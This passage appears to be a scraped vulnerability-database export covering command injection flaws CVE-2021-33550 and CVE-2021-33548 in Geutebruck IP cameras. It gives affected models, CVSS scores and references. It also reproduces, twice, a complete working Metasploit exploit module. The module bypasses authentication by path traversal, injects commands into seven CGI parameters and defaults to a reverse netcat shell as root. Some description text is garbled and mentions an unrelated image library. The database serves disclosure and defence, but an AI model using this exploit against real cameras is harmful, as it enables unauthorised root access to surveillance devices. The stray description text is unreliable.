raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33550"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33550",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2087",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33550",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"id": "VAR-202109-0859",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T22:27:30.399000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Multiple Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158067"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2087"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:23.040000",
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2087"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:51.920000",
"db": "NVD",
"id": "CVE-2021-33550"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2087"
}
],
"trust": 0.6
}
}
VAR-202109-0857
Vulnerability from variot - Updated: 2025-01-30 22:14Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0857",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33548"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2089"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33548",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33548",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33548",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
